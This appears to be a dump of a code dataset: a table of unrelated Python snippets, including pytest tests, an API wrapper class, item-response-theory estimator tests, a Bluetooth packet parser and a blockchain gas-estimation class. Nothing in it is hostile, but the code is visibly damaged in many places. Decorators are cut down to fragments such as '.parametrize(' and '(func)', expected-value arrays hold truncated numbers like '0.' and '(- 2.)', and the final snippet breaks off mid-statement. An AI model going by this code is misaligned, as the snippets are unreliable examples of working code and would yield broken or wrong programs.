code stringlengths 281 23.7M |
|---|
.parametrize('distance_matrix, expected_distance', [(distance_matrix1, optimal_distance1), (distance_matrix2, optimal_distance2), (distance_matrix3, optimal_distance3)])
def test_solution_is_optimal(distance_matrix, expected_distance):
(_, distance) = solve_tsp_branch_and_bound(distance_matrix)
assert (distance == expected_distance) |
class CO2eqParametersLifecycle(BaseClasses.CO2eqParametersDirectAndLifecycleBase):
parameters = CO2EQ_PARAMETERS_LIFECYCLE
ranges_by_mode: dict[(str, tuple[((int | float), (int | float))])] = {'oil': (600, 1600), 'coal': (500, 1600), 'gas': (400, 900), 'geothermal': (30, 199), 'hydro': (10, 25), 'nuclear': (4, 12), 'biomass': (0.4, 1300), 'solar': (25, 45), 'wind': (10, 13), 'battery charge': (0, 0), 'hydro charge': (0, 0), 'battery discharge': (10, 1200), 'hydro discharge': (10, 1200), 'unknown': (10, 1000)} |
.parametrize('method,expected', (('test_endpoint', 'value-a'), ('not_implemented', NotImplementedError)))
def test_fixture_middleware(w3, method, expected):
w3.middleware_onion.add(construct_fixture_middleware({'test_endpoint': 'value-a'}))
if (isinstance(expected, type) and issubclass(expected, Exception)):
with pytest.raises(expected):
w3.manager.request_blocking(method, [])
else:
actual = w3.manager.request_blocking(method, [])
assert (actual == expected) |
class PageAboutStory(AbstractCrudObject):
def __init__(self, fbid=None, parent_id=None, api=None):
self._isPageAboutStory = True
super(PageAboutStory, self).__init__(fbid, parent_id, api)
class Field(AbstractObject.Field):
composed_text = 'composed_text'
cover_photo = 'cover_photo'
entity_map = 'entity_map'
id = 'id'
is_published = 'is_published'
page_id = 'page_id'
title = 'title'
def api_get(self, fields=None, params=None, batch=None, success=None, failure=None, pending=False):
from facebook_business.utils import api_utils
if ((batch is None) and ((success is not None) or (failure is not None))):
api_utils.warning('`success` and `failure` callback only work for batch call.')
param_types = {}
enums = {}
request = FacebookRequest(node_id=self['id'], method='GET', endpoint='/', api=self._api, param_checker=TypeChecker(param_types, enums), target_class=PageAboutStory, api_type='NODE', response_parser=ObjectParser(reuse_object=self))
request.add_params(params)
request.add_fields(fields)
if (batch is not None):
request.add_to_batch(batch, success=success, failure=failure)
return request
elif pending:
return request
else:
self.assure_call()
return request.execute()
_field_types = {'composed_text': 'list<PageAboutStoryComposedBlock>', 'cover_photo': 'Photo', 'entity_map': 'list<Object>', 'id': 'string', 'is_published': 'bool', 'page_id': 'string', 'title': 'string'}
def _get_field_enum_info(cls):
field_enum_info = {}
return field_enum_info |
.parametrize(('input_data', 'expected'), [({}, {}), ({2016: {1: 1, 4: 4}}, {2016: {1: 1, 2: 0, 3: 0, 4: 4}}), ({2000: {12: 1}, 2001: {2: 1}}, {2000: {12: 1}, 2001: {1: 0, 2: 1}}), ({2000: {11: 1}, 2001: {1: 1}}, {2000: {11: 1, 12: 0}, 2001: {1: 1}})])
def test_fill_in_time_gaps(input_data, expected):
_fill_in_time_gaps(input_data)
assert (input_data == expected) |
def merge_neighbors_loose_p_value(pLoosePValue, pData, pViewpointObj, pResolution, pTruncateZeroPvalues):
accepted = {}
accepted_line = {}
if isinstance(pLoosePValue, float):
for key in pData[0]:
if pTruncateZeroPvalues:
if ((pData[0][key][1] == 0) or (pData[0][key][1] > pLoosePValue)):
continue
elif (pData[0][key][1] > pLoosePValue):
continue
accepted[key] = pData[0][key]
accepted_line[key] = pData[1][key]
elif isinstance(pLoosePValue, dict):
for key in pData[0]:
if pTruncateZeroPvalues:
if ((pData[0][key][1] == 0) or (pData[0][key][1] > pLoosePValue[key])):
continue
elif (pData[0][key][1] > pLoosePValue[key]):
continue
accepted[key] = pData[0][key]
accepted_line[key] = pData[1][key]
if accepted_line:
return pViewpointObj.merge_neighbors(accepted_line, pMergeThreshold=pResolution)
return (accepted_line, None) |
def _check_updates_dom0():
try:
subprocess.check_call(['sudo', 'qubes-dom0-update', '--check-only'])
except subprocess.CalledProcessError as e:
sdlog.error('dom0 updates required, or cannot check for updates')
sdlog.error(str(e))
return UpdateStatus.UPDATES_REQUIRED
sdlog.info('No updates available for dom0')
return UpdateStatus.UPDATES_OK |
class WidgetEventFilter(QtCore.QObject):
def __init__(self, widget):
QtCore.QObject.__init__(self)
self._widget = widget
def eventFilter(self, obj, event):
widget = self._widget
if (obj is not widget.control):
return False
event_type = event.type()
if (event_type in {QtCore.QEvent.Type.Show, QtCore.QEvent.Type.Hide}):
widget.visible = (not widget.control.isHidden())
return False |
def test_remote_set_signal(remote):
mock_client = MagicMock()
def checker(request):
assert (request.id.signal_id == 'sigid')
assert (request.value.scalar.primitive.integer == 3)
mock_client.set_signal.side_effect = checker
remote._client = mock_client
remote.set_signal('sigid', 'execid', 3) |
def render_template(input_files, template_file, output_file):
if (isinstance(input_files, str) and input_files):
input_files = (input_files,)
all_input_files = ()
gen_kw_export_path = (DEFAULT_GEN_KW_EXPORT_NAME + '.json')
if os.path.isfile(gen_kw_export_path):
all_input_files += (gen_kw_export_path,)
if input_files:
all_input_files += tuple(input_files)
_assert_input(all_input_files, template_file, output_file)
template = _load_template(template_file)
data = _load_input(all_input_files)
with open(output_file, 'w', encoding='utf-8') as fout:
fout.write(template.render(**data)) |
class aifunc():
model = None
embedding_provider = None
def __init__(self, tools: List=[]):
self.tools = tools
def __call__(self, func):
(func)
def inner(*args, model=None, embedding_provider=None, **kwargs):
sig = inspect.signature(func)
agent_kwargs = {'model': (model or aifunc.model), 'embedding_provider': (embedding_provider or aifunc.embedding_provider)}
agent = kwargs.pop('agent', loopgpt.agent.ACTIVE_AGENT)
if (agent is None):
agent = empty_agent(**agent_kwargs)
agent.name = func.__name__
func_prompt = get_func_prompt(func, sig)
agent.description = func_prompt
if ((len(args) == 0) and (len(kwargs) == 0)):
args_str = 'Arguments:\n\nThis function does not take any arguments.'
else:
args_str = get_args_prompt(sig, args, kwargs)
if self.tools:
analyzer = create_analyzer_agent(func_prompt, self.tools, args_str, **agent_kwargs)
collector = create_data_collector_agent(func_prompt, self.tools, args_str, **agent_kwargs)
analyzer.memory = agent.memory
collector.memory = agent.memory
commands = collector.chat(response_callback=collector_response_callback)
req_data = True
while (commands and req_data):
command = commands[0]
if (command['function'] == func.__name__):
commands.pop(0)
continue
tool = collector.tools[command['function']]
resp = str(tool.run(**command['args']))
last_command = str([{'function': command['function'], 'args': command['args'], 'response': resp}])
msg = {'role': 'system', 'content': f"You executed {command['function']} with {command['args']} and got the response: {resp}."}
collector.history.append(msg)
analyzer.history.append(msg)
if ((len(commands) > 1) and ('<' in str(commands[1]['args']))):
new_commands = expand_placeholders(commands, last_command)
if new_commands:
commands = new_commands
commands.pop(0)
if (len(commands) == 0):
req_data = analyzer.chat(response_callback=None)
if (req_data == 'yes'):
commands = collector.chat(response_callback=collector_response_callback)
resp = agent.chat((args_str + 'Respond only with your return value. Your response is to be directly parsed, strictly do not include any other text in your response.'), response_callback=None)
resp = main_response_callback(resp, sig.return_annotation)
return resp
return inner |
class TestMMLEAPMethods(unittest.TestCase):
def test_2pl_mml_eap_method(self):
rng = np.random.default_rng()
n_items = 5
n_people = 150
difficulty = rng.standard_normal(n_items)
discrimination = (rng.rayleigh(scale=0.8, size=n_items) + 0.25)
thetas = rng.standard_normal(n_people)
syn_data = create_synthetic_irt_dichotomous(difficulty, discrimination, thetas, seed=rng)
result = twopl_mml_eap(syn_data, {'hyper_quadrature_n': 21})
expected_difficulty = np.array([(- 2.), 0., 0., 0., (- 0.)])
expected_discrimination = np.array([1., 1., 1., 0., 1.])
expected_rayleigh_scale = 0.
np.testing.assert_allclose(result['Difficulty'], expected_difficulty, atol=0.001, rtol=0.001)
np.testing.assert_allclose(result['Discrimination'], expected_discrimination, atol=0.001, rtol=0.001)
self.assertAlmostEqual(result['Rayleigh_Scale'], expected_rayleigh_scale, 3)
def test_2pl_mml_eap_method_csirt(self):
rng = np.random.default_rng()
n_items = 10
n_people = 300
difficulty = rng.standard_normal(n_items)
discrimination = (rng.rayleigh(scale=0.8, size=n_items) + 0.25)
thetas = rng.standard_normal(n_people)
syn_data = create_synthetic_irt_dichotomous(difficulty, discrimination, thetas, seed=rng)
result = twopl_mml_eap(syn_data, {'estimate_distribution': True})
expected_difficulty = np.array([2., 0., 1., (- 0.), 0., 1.2814035, (- 1.), 0., 1., (- 2.)])
expected_discrimination = np.array([1., 1., 0., 0., 1., 1., 0., 0., 0., 0.])
expected_rayleigh_scale = 0.
np.testing.assert_allclose(result['Difficulty'], expected_difficulty, atol=0.001, rtol=0.001)
np.testing.assert_allclose(result['Discrimination'], expected_discrimination, atol=0.001, rtol=0.001)
self.assertAlmostEqual(result['Rayleigh_Scale'], expected_rayleigh_scale, 3)
def test_grm_mml_eap_method(self):
rng = np.random.default_rng()
n_items = 10
n_people = 300
difficulty = rng.standard_normal((n_items, 3))
difficulty = np.sort(difficulty, axis=1)
discrimination = (rng.rayleigh(scale=0.8, size=n_items) + 0.25)
thetas = rng.standard_normal(n_people)
syn_data = create_synthetic_irt_polytomous(difficulty, discrimination, thetas, seed=rng)
result = grm_mml_eap(syn_data, {'hyper_quadrature_n': 21})
expected_difficulty = np.array([[(- 0.), (- 0.0676688), 1.], [0., 2., 2.], [(- 0.), 0., 1.], [(- 0.), (- 0.2025803), 0.], [0., 1., 1.], [(- 0.), (- 0.), 0.], [(- 1.), (- 0.), 1.], [0., 0., 0.], [(- 0.), 0., 1.1572905], [(- 0.), (- 0.), 0.]])
expected_discrimination = np.array([1., 0.9014368, 1., 1., 1., 1., 1., 0., 1., 1.])
expected_rayleigh_scale = 0.
np.testing.assert_allclose(result['Difficulty'], expected_difficulty, atol=0.001, rtol=0.001)
np.testing.assert_allclose(result['Discrimination'], expected_discrimination, atol=0.001, rtol=0.001)
self.assertAlmostEqual(result['Rayleigh_Scale'], expected_rayleigh_scale, 3) |
.django_db
def test_match_from_component_both_filters(client, monkeypatch, elasticsearch_award_index, subaward_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_treasury_account_components_subaward(client, {'require': [_agency_path(BASIC_TAS)]}, [component_dictionary(BASIC_TAS)])
assert (resp.json()['results'] == [_subaward1()]) |
def displayCode(dom, element):
source = dom.executeString(f"getOrGenerateId(getElement('{element}').firstElementChild.nextElementSibling);")
code = clean(dom.getValue(source))
target = dom.executeString(f"getOrGenerateId(getElement('{source}').nextElementSibling.nextElementSibling.firstElementChild.nextElementSibling.firstElementChild.nextElementSibling);")
dom.setValue(target, html.escape(code)) |
class HCI_LEM_Ext_Adv_Report(Packet):
def __init__(self):
self.name = 'Ext Adv Report'
self.payload = [BitFieldByte('ev type', 0, ['Connectable', 'Scannable', 'Directed', 'Scan Response', 'Legacy', 'Incomplete/more', 'Incomplete/truncated', 'RFU']), UIntByte('unused'), EnumByte('addr type', 0, {0: 'public device', 1: 'random device', 2: 'public identity', 3: 'random identity', 255: 'anonymous'}), MACAddr('peer'), EnumByte('primary phy', 1, {1: 'LE 1M', 3: 'LE Coded'}), EnumByte('secondary phy', 0, {0: 'N/A', 1: 'LE 1M', 2: 'LE 2M', 3: 'LE Coded'}), EnumByte('adv sid', 255, {0: '0x00', 1: '0x01', 2: '0x02', 3: '0x03', 4: '0x04', 5: '0x05', 6: '0x06', 7: '0x07', 8: '0x08', 9: '0x09', 10: '0x0A', 11: '0x0B', 12: '0x0C', 13: '0x0D', 14: '0x0E', 15: '0x0F', 255: 'N/A'}), IntByte('tx power'), IntByte('rssi'), UShortInt('adv interval', endian='little'), EnumByte('direct addr type', 0, {0: 'public device', 1: 'random device', 2: 'public identity', 3: 'random identity', 254: 'random device'}), MACAddr('direct addr'), UIntByte('data len')]
def decode(self, data):
for x in self.payload:
data = x.decode(data)
datalength = self.payload[(- 1)].val
while (datalength > 0):
ad = AD_Structure()
data = ad.decode(data)
self.payload.append(ad)
datalength -= len(ad)
return data
def show(self, depth=0):
print('{}{}:'.format((PRINT_INDENT * depth), self.name))
for x in self.payload:
x.show((depth + 1)) |
class GymChannel():
THREAD_POOL_SIZE = 3
def __init__(self, address: Address, gym_env: gym.Env):
self.address = address
self.gym_env = gym_env
self._loop: Optional[AbstractEventLoop] = None
self._queue: Optional[asyncio.Queue] = None
self._threaded_pool: ThreadPoolExecutor = ThreadPoolExecutor(self.THREAD_POOL_SIZE)
self.logger: Union[(logging.Logger, logging.LoggerAdapter)] = _default_logger
self._dialogues = GymDialogues()
def _get_message_and_dialogue(self, envelope: Envelope) -> Tuple[(GymMessage, Optional[GymDialogue])]:
message = cast(GymMessage, envelope.message)
dialogue = cast(GymDialogue, self._dialogues.update(message))
return (message, dialogue)
def queue(self) -> asyncio.Queue:
if (self._queue is None):
raise ValueError('Channel is not connected')
return self._queue
async def connect(self) -> None:
if self._queue:
return None
self._loop = asyncio.get_event_loop()
self._queue = asyncio.Queue()
async def send(self, envelope: Envelope) -> None:
sender = envelope.sender
self.logger.debug('Processing message from {}: {}'.format(sender, envelope))
if (envelope.protocol_specification_id != GymMessage.protocol_specification_id):
raise ValueError('This protocol is not valid for gym.')
(await self.handle_gym_message(envelope))
async def _run_in_executor(self, fn: Callable, *args: Any) -> Tuple[(Any, float, bool, Dict)]:
if (self._loop is None):
raise ValueError('Loop not set!')
return (await self._loop.run_in_executor(self._threaded_pool, fn, *args))
async def handle_gym_message(self, envelope: Envelope) -> None:
enforce(isinstance(envelope.message, GymMessage), 'Message not of type GymMessage')
(gym_message, dialogue) = self._get_message_and_dialogue(envelope)
if (dialogue is None):
self.logger.warning('Could not create dialogue from message={}'.format(gym_message))
return
if (gym_message.performative == GymMessage.Performative.ACT):
action = gym_message.action.any
step_id = gym_message.step_id
(observation, reward, done, info) = (await self._run_in_executor(self.gym_env.step, action))
msg = dialogue.reply(performative=GymMessage.Performative.PERCEPT, target_message=gym_message, observation=GymMessage.AnyObject(observation), reward=reward, done=done, info=GymMessage.AnyObject(info), step_id=step_id)
elif (gym_message.performative == GymMessage.Performative.RESET):
(await self._run_in_executor(self.gym_env.reset))
msg = dialogue.reply(performative=GymMessage.Performative.STATUS, target_message=gym_message, content={'reset': 'success'})
elif (gym_message.performative == GymMessage.Performative.CLOSE):
(await self._run_in_executor(self.gym_env.close))
return
envelope = Envelope(to=msg.to, sender=msg.sender, message=msg)
(await self._send(envelope))
async def _send(self, envelope: Envelope) -> None:
(await self.queue.put(envelope))
async def disconnect(self) -> None:
if (self._queue is not None):
(await self._queue.put(None))
self._queue = None
async def get(self) -> Optional[Envelope]:
return (await self.queue.get()) |
def test_numpy_ufunc():
vx = [(- 1.0), 0.0, 1.0]
vy = [1.0, 2.0, 4.0]
vc = [(1j * 0.5), (1.5 + (1j * 2.0)), ((- 0.5) + (1j * 0))]
nx = np.asarray(vx)
ny = np.asarray(vy)
nc = np.asarray(vc)
fx = Fxp(vx, True, (16 * 8), (8 * 8))
fy = Fxp(vy, True, (12 * 8), (4 * 8))
fc = Fxp(vc, True, (12 * 8), (4 * 8))
c = 2.0
ufunc_one_param_list = [np.positive, np.negative, np.conj, np.exp, np.abs, np.sin]
for ufunc in ufunc_one_param_list:
assert (ufunc(nx) == ufunc(fx)()).all()
assert (ufunc(ny) == ufunc(fy)()).all()
assert (ufunc(nc) == ufunc(fc)()).all()
ufunc_one_positive_param_list = [np.log, np.log10, np.sqrt]
for ufunc in ufunc_one_positive_param_list:
assert np.allclose(ufunc(ny), ufunc(fy)(), rtol=fy.precision)
ufunc_two_params_list = [np.add, np.subtract, np.multiply, np.divide]
for ufunc in ufunc_two_params_list:
assert (ufunc(nx, c) == ufunc(fx, c)()).all()
assert (ufunc(ny, c) == ufunc(fy, c)()).all()
assert (ufunc(nx, ny) == ufunc(fx, fy)()).all()
assert (ufunc(nx, ny) == ufunc(nx, fy)()).all()
assert (ufunc(nx, ny) == ufunc(fx, ny)()).all()
ufunc_two_array_params_list = [np.matmul]
for ufunc in ufunc_two_array_params_list:
assert (ufunc(nx, ny) == ufunc(fx, fy)()).all()
assert (ufunc(nx, ny) == ufunc(nx, fy)()).all()
assert (ufunc(nx, ny) == ufunc(fx, ny)()).all() |
class Position(DocType):
securityId = Keyword()
longAmount = Long()
availableLong = Long()
averageLongPrice = Long()
shortAmount = Long()
availableShort = Long()
averageShortPrice = Long()
value = Float()
tradingT = Short()
def __init__(self, meta=None, security_id=None, trading_t=1, **kwargs):
super().__init__(meta, **kwargs)
self.securityId = security_id
self.longAmount = 0
self.availableLong = 0
self.shortAmount = 0
self.availableShort = 0
self.profit = 0
self.value = 0
self.tradingT = trading_t |
('flytekit.remote.remote_callable.create_and_link_node_from_remote')
def test_lazy_loading_compile(create_and_link_node_from_remote_mock):
once = True
def _getter():
nonlocal once
if (not once):
raise ValueError('Should be called once only')
once = False
return dummy_task
e = LazyEntity('x', _getter)
assert (e.name == 'x')
assert (e._entity is None)
ctx = context_manager.FlyteContext.current_context()
e.compile(ctx)
assert (e._entity is not None)
assert (e.entity == dummy_task) |
class OfflineMessageTableStrategy(GasStrategy):
DEFAULT_FALLBACK_GAS_LIMIT = 400000
DEFAULT_BLOCK_LIMIT = 2000000
def default_table() -> 'OfflineMessageTableStrategy':
strategy = OfflineMessageTableStrategy()
strategy.update_entry('cosmos.bank.v1beta1.MsgSend', 100000)
strategy.update_entry('cosmwasm.wasm.v1.MsgStoreCode', 2000000)
strategy.update_entry('cosmwasm.wasm.v1.MsgInstantiateContract', 250000)
strategy.update_entry('cosmwasm.wasm.v1.MsgExecuteContract', 400000)
return strategy
def __init__(self, fallback_gas_limit: Optional[int]=None, block_limit: Optional[int]=None):
self._table: Dict[(str, int)] = {}
self._block_limit = (block_limit or self.DEFAULT_BLOCK_LIMIT)
self._fallback_gas_limit = (fallback_gas_limit or self.DEFAULT_FALLBACK_GAS_LIMIT)
def update_entry(self, transaction_type: str, gas_limit: int):
self._table[str(transaction_type)] = int(gas_limit)
def estimate_gas(self, tx: Transaction) -> int:
gas_estimate = 0
for msg in tx.msgs:
gas_estimate += self._table.get(msg.DESCRIPTOR.full_name, self._fallback_gas_limit)
return self._clip_gas(gas_estimate)
def block_gas_limit(self) -> int:
return self._block_limit |
def test_main():
outfile = NamedTemporaryFile(suffix='.txt', delete=True)
args = '--range {} {} -tv {} -o {}'.format(200000, 200000, 0.5, outfile.name).split()
hicCreateThresholdFile.main(args)
assert are_files_equal((ROOT + 'hicCreateThresholdFile/thresholdFile_loose_pValue.txt'), outfile.name, delta=1) |
_router.get('/item/', response_model=CollectionItemListResponse, dependencies=PERMISSIONS_READ)
def item_list(queryset: CollectionItemQuerySet=Depends(get_item_queryset), stoken: t.Optional[str]=None, limit: int=50, prefetch: Prefetch=PrefetchQuery, withCollection: bool=False, user: UserType=Depends(get_authenticated_user)):
if (not withCollection):
queryset = queryset.filter(parent__isnull=True)
response = item_list_common(queryset, user, stoken, limit, prefetch)
return response |
.django_db
def test_remove_empty_federal_accounts():
baker.make(FederalAccount, pk=1, agency_identifier='ab1', main_account_code='0987')
baker.make(FederalAccount, pk=2, agency_identifier='ab2', main_account_code='0987')
baker.make(FederalAccount, pk=4, agency_identifier='ab4', main_account_code='0987')
baker.make(FederalAccount, pk=5, agency_identifier='ab5', main_account_code='0987')
baker.make(FederalAccount, pk=6, agency_identifier='ab6', main_account_code='0987')
baker.make(TreasuryAppropriationAccount, pk=1, agency_id='ab1', main_account_code='0987', federal_account_id=1)
baker.make(TreasuryAppropriationAccount, pk=2, agency_id='ab2', main_account_code='0987')
assert (FederalAccount.objects.count() == 5)
remove_empty_federal_accounts()
assert (FederalAccount.objects.count() == 2) |
class TestTupleIndexManager(IndexManagerMixin, TestCase):
def setUp(self):
super().setUp()
self.index_manager = TupleIndexManager()
def tearDown(self):
self.index_manager.reset()
def test_complex_sequence_round_trip(self):
sequence = (5, 6, 7, 8, 9, 10)
index = self.index_manager.from_sequence(sequence)
result = self.index_manager.to_sequence(index)
self.assertEqual(result, sequence)
def test_complex_sequence_identical_index(self):
sequence = (5, 6, 7, 8, 9, 10)
index_1 = self.index_manager.from_sequence(sequence[:])
index_2 = self.index_manager.from_sequence(sequence[:])
self.assertIs(index_1, index_2)
def test_complex_sequence_to_parent_row(self):
sequence = (5, 6, 7, 8, 9, 10)
index = self.index_manager.from_sequence(sequence)
(parent, row) = self.index_manager.get_parent_and_row(index)
self.assertEqual(row, 10)
self.assertIs(parent, self.index_manager.from_sequence((5, 6, 7, 8, 9)))
def test_complex_index_round_trip(self):
sequence = (5, 6, 7, 8, 9, 10)
parent = Root
for (depth, row) in enumerate(sequence):
with self.subTest(depth=depth):
index = self.index_manager.create_index(parent, row)
result = self.index_manager.get_parent_and_row(index)
self.assertIs(result[0], parent)
self.assertEqual(result[1], row)
parent = index
def test_complex_index_create_index_identical(self):
sequence = (5, 6, 7, 8, 9, 10)
parent = Root
for (depth, row) in enumerate(sequence):
with self.subTest(depth=depth):
index_1 = self.index_manager.create_index(parent, row)
index_2 = self.index_manager.create_index(parent, row)
self.assertIs(index_1, index_2)
parent = index_1
def test_complex_index_to_sequence(self):
sequence = (5, 6, 7, 8, 9, 10)
parent = Root
for (depth, row) in enumerate(sequence):
with self.subTest(depth=depth):
index = self.index_manager.create_index(parent, row)
result = self.index_manager.to_sequence(index)
self.assertEqual(result, sequence[:(depth + 1)])
parent = index
def test_complex_index_sequence_round_trip(self):
parent = Root
for (depth, row) in enumerate([5, 6, 7, 8, 9, 10]):
with self.subTest(depth=depth):
index = self.index_manager.create_index(parent, row)
sequence = self.index_manager.to_sequence(index)
result = self.index_manager.from_sequence(sequence)
self.assertIs(result, index)
parent = index
def test_complex_index_id_round_trip(self):
sequence = (5, 6, 7, 8, 9, 10)
parent = Root
for (depth, row) in enumerate(sequence):
with self.subTest(depth=depth):
index = self.index_manager.create_index(parent, row)
id = self.index_manager.id(index)
self.assertIsInstance(id, int)
result = self.index_manager.from_id(id)
self.assertIs(result, index)
parent = index |
class InlineImage(object):
tpl = None
image_descriptor = None
width = None
height = None
def __init__(self, tpl, image_descriptor, width=None, height=None):
(self.tpl, self.image_descriptor) = (tpl, image_descriptor)
(self.width, self.height) = (width, height)
def _insert_image(self):
pic = self.tpl.current_rendering_part.new_pic_inline(self.image_descriptor, self.width, self.height).xml
return ('</w:t></w:r><w:r><w:drawing>%s</w:drawing></w:r><w:r><w:t xml:space="preserve">' % pic)
def __unicode__(self):
return self._insert_image()
def __str__(self):
return self._insert_image()
def __html__(self):
return self._insert_image() |
def extractMobileSuitZetaGundamNovelsTranslation(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
if ('WATTT' in item['tags']):
return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix)
return False |
def extractYellowpufffWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class IAsyncTrainingStartTimeDistr(abc.ABC):
def __init__(self, **kwargs) -> None:
init_self_cfg(self, component_class=__class__, config_class=AsyncTrainingStartTimeDistrConfig, **kwargs)
assert (self.cfg.training_rate > 0), f'Event rate must be positive, got {self.cfg.training_rate}'
def _set_defaults_in_cfg(cls, cfg):
pass
def time_to_next_event_start(self) -> float:
pass |
.skip
def test_en_ner_simple_types(NLP):
doc = NLP('Mr. Best flew to New York on Saturday morning.')
assert (doc.ents[0].start == 1)
assert (doc.ents[0].end == 2)
assert (doc.ents[0].label_ == 'PERSON')
assert (doc.ents[1].start == 4)
assert (doc.ents[1].end == 6)
assert (doc.ents[1].label_ == 'GPE') |
class TwoPartSimpleModel(nn.Module):
def __init__(self):
super().__init__()
self.part1 = SimpleModel()
self.part2 = SimpleModel()
def forward(self, x):
x = self.part1(x)
x = TwoPartSimpleModel.non_traceable_func(x)
x = self.part2(x)
return x
def prepare_for_export(self, cfg, inputs, predictor_type):
def data_generator(x):
part1_args = (x,)
x = self.part1(x)
x = TwoPartSimpleModel.non_traceable_func(x)
part2_args = (x,)
return {'part1': part1_args, 'part2': part2_args}
return PredictorExportConfig(model={'part1': self.part1, 'part2': self.part2}, data_generator=data_generator, run_func_info=FuncInfo.gen_func_info(TwoPartSimpleModel.RunFunc, params={}))
def non_traceable_func(x):
return ((x + 1) if (len(x.shape) > 3) else (x - 1))
class RunFunc(object):
def __call__(self, model, x):
assert isinstance(model, dict)
x = model['part1'](x)
x = TwoPartSimpleModel.non_traceable_func(x)
x = model['part2'](x)
return x |
def test_io_dispersive(tmp_path):
Mx_custom = 1.0
My_custom = 2.1
Nx = 10
Ny = 11
x_custom = np.linspace(((- Mx_custom) / 2), (Mx_custom / 2), Nx)
y_custom = np.linspace(((- My_custom) / 2), (My_custom / 2), Ny)
z_custom = [0]
delep_data = np.ones([len(x_custom), len(y_custom), len(z_custom)])
delep_dataset = td.SpatialDataArray(delep_data, coords={'x': x_custom, 'y': y_custom, 'z': z_custom})
gamma_dataset = xr.zeros_like(delep_dataset)
f0_dataset = td.SpatialDataArray((np.ones_like(delep_data) * .0), coords={'x': x_custom, 'y': y_custom, 'z': z_custom})
eps_inf_dataset = xr.ones_like(delep_dataset)
mat_custom = td.CustomLorentz(eps_inf=eps_inf_dataset, coeffs=((delep_dataset, f0_dataset, gamma_dataset),))
struct = td.Structure(geometry=td.Box(size=(0.5, 0.5, 0.5)), medium=mat_custom)
sim = td.Simulation(run_time=1e-12, size=(1, 1, 1), grid_spec=td.GridSpec.auto(wavelength=1.0), structures=(struct,))
filename = str((tmp_path / 'sim.hdf5'))
sim.to_file(filename)
sim_load = td.Simulation.from_file(filename)
assert (sim_load == sim) |
class Dispatcher():
def __init__(self):
self._registry: Dict[(Type[Operation], Callable[([Operation], str)])] = {}
def dispatch_for(self, target: Type[Operation]) -> Callable[([Callable[([Operation], str)]], Callable[([Operation], str)])]:
def wrap(fn: Callable[([Operation], str)]) -> Callable[([Operation], str)]:
self._registry[target] = fn
return fn
return wrap
def dispatch(self, obj: Operation):
targets = type(obj).__mro__
for target in targets:
if (target in self._registry):
return self._registry[target]
raise ValueError(f'no dispatch function for object: {obj}') |
class JsCookies():
def __init__(self, page: Optional[primitives.PageModel]):
self.page = page
def set(self, key: str, data, data_key: str=None, python_data=True, js_funcs: Optional[Union[(list, str)]]=None):
data = JsUtils.jsConvert(data, data_key, python_data, js_funcs)
if (self.page._context.get('cookies') is None):
self.page._context['cookies'] = True
return ("document.cookies = {'%s': %s}" % (key, data))
return ("document.cookies['%s'] = %s" % (key, data))
def get(self, data: Union[(str, primitives.JsDataModel)]=None, js_conv_func: Optional[Union[(str, list)]]=True, js_result_func: Optional[str]=None):
if (data is None):
return Js.JsJson().parse('decodeURIComponent(document.cookies)', js_result_func=js_result_func)
data = JsUtils.jsConvertData(data, js_conv_func)
return Js.JsJson().parse(("decodeURIComponent(document.cookies)['%s']" % data), js_result_func=js_result_func) |
class OptionSeriesPictorialSonificationDefaultspeechoptionsMapping(Options):
def pitch(self) -> 'OptionSeriesPictorialSonificationDefaultspeechoptionsMappingPitch':
return self._config_sub_data('pitch', OptionSeriesPictorialSonificationDefaultspeechoptionsMappingPitch)
def playDelay(self) -> 'OptionSeriesPictorialSonificationDefaultspeechoptionsMappingPlaydelay':
return self._config_sub_data('playDelay', OptionSeriesPictorialSonificationDefaultspeechoptionsMappingPlaydelay)
def rate(self) -> 'OptionSeriesPictorialSonificationDefaultspeechoptionsMappingRate':
return self._config_sub_data('rate', OptionSeriesPictorialSonificationDefaultspeechoptionsMappingRate)
def text(self):
return self._config_get(None)
def text(self, text: str):
self._config(text, js_type=False)
def time(self) -> 'OptionSeriesPictorialSonificationDefaultspeechoptionsMappingTime':
return self._config_sub_data('time', OptionSeriesPictorialSonificationDefaultspeechoptionsMappingTime)
def volume(self) -> 'OptionSeriesPictorialSonificationDefaultspeechoptionsMappingVolume':
return self._config_sub_data('volume', OptionSeriesPictorialSonificationDefaultspeechoptionsMappingVolume) |
def load_config_files(config_paths: []) -> dict:
config = {}
for config_path in config_paths:
try:
loaded_config = hjson.load(open(config_path, encoding='utf-8'))
config = {**config, **loaded_config}
except Exception as e:
raise Exception('failed to load config file', config_path, e)
return config |
def test_script(flatpak_builder: FlatpakBuilder) -> None:
COMMANDS = ['echo 123']
with ManifestGenerator() as gen:
gen.add_script_source(COMMANDS, Path('script'))
flatpak_builder.build(sources=gen.ordered_sources())
with (flatpak_builder.module_dir / 'script').open() as fp:
assert fp.readline().startswith('#!')
assert (fp.readline().strip() == 'echo 123') |
class SplitterGroupEditor(GroupEditor):
splitter = Instance(_GroupSplitter)
def restore_prefs(self, prefs):
if isinstance(prefs, dict):
structure = prefs.get('structure')
else:
structure = prefs
self.splitter._initialized = True
self.splitter.restoreState(structure)
def save_prefs(self):
return {'structure': self.splitter.saveState().data()} |
class ReconnectLogic(zeroconf.RecordUpdateListener):
def __init__(self, *, client: APIClient, on_connect: Callable[([], Awaitable[None])], on_disconnect: Callable[([bool], Awaitable[None])], zeroconf_instance: (ZeroconfInstanceType | None)=None, name: (str | None)=None, on_connect_error: (Callable[([Exception], Awaitable[None])] | None)=None) -> None:
self.loop = asyncio.get_event_loop()
self._cli = client
self.name: (str | None) = None
if name:
self.name = name
elif (host_is_name_part(client.address) or address_is_local(client.address)):
self.name = client.address.partition('.')[0]
if self.name:
self._cli.set_cached_name_if_unset(self.name)
self._on_connect_cb = on_connect
self._on_disconnect_cb = on_disconnect
self._on_connect_error_cb = on_connect_error
self._zeroconf_manager = client.zeroconf_manager
if (zeroconf_instance is not None):
